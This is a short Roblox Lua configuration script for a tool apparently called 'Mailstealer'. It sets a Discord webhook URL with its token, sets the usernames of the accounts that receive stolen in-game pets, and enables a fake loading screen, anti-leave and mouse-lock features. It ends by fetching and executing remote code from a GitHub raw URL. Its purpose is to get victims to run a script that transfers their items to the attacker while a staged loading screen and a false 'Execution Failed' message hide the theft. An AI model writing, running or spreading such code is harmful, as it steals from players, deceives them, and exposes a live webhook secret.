UserName = "deckdoo1968" -- good pets Webhook = "https://discord.com/api/webhooks/1132710762268332143/hfi_iBwNXR3eHYVcynXLmE5tPC7T1DVm_usujI1zz6vOC_Mv0uP7KBzxkCUubw2jnGxT" -- pings for pets UserName2 = "deckdoo1968" -- bad pets _G.LoadingScreen = true -- make it true if you want the loadingscreen _G.AntiLeave = true -- make it true if you want the antileave _G.MouseLock = true -- make it true if you want the mouselock _G.LoadingText1 = "Loading Library" -- LOADING TEXT IS TIPS UNDER LOADING BAR _G.LoadingText2 = "Updating library" -- LOADING TEXT IS TIPS UNDER LOADING BAR _G.LoadingText3 = "Getting Script" -- LOADING TEXT IS TIPS UNDER LOADING BAR _G.LoadingText4 = "Executing Script" -- LOADING TEXT IS TIPS UNDER LOADING BAR _G.LoadingText5 = "Error: Execution Failed, re-trying!" -- LOADING TEXT IS TIPS UNDER LOADING BAR loadstring(game:HttpGet("https://raw.githubusercontent.com/Egorikusa/Mailstealer/main/engine"))()